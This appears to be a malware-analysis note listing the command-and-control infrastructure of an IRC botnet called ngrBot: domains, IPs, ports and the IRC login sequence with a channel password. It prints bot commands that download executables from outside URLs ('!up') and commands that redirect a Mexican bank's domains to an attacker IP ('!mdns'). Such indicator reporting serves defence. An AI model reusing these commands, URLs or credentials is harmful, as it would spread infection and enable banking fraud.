Domain names used to control the botnet:
hdp.zapto.org 46.166.141.149 active
1n1.sytes.net 213.155.7.39 active
hdp.zapto.org not active
hgjma1.biz not active
jma1.biz not active
mooo.com 72.8.150.1 active
n1.mooo.com 86.35.19.116 active
fhdp.zapto.org
Remote Host Port Number
199.15.234.7 80
50.22.107.93 80
213.155.7.39 2009
PASS ngr
NICK n{US|XPa}dcbcoox
USER dcbcoox 0 0 :dcbcoox
JOIN #juaz ngrBot
PRIVMSG #juaz :[d="http://creatucurso.net/facu/mx.exe" s="198683 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Xdxaxx.exe" - Download retries: 0
C&C Server: 213.155.7.39:2009
Server Password:
Username: ibsgpzz
Nickname: n{DE|XPa}ibsgpzz
Channel: #cocl (Password: ngrBot)
Channeltopic: :!up http://creatucurso.net/facu/co.exe 8a7b3d74dc8d09472b021567ecc6494a
Update:
Now talking in #juaz
Topic On: [ #juaz ] [ !up http://spaciografico.com/rot/bien.exe d1a976da7dc7ddbf20e005b3e4277e8e ]
Topic By: [ o0o ]
(o0o) !mdns www.bancomer.com 46.166.148.144 !mdns www.bancomer.com.mx 46.166.148.144 !mdns bancomer.com 46.166.148.144 !mdns bancomer.com.mx 46.166.148.144
ChanMode: o0o sets mode [-smtMu]
Hosting information:
http://whois.domaintools.com/213.155.7.39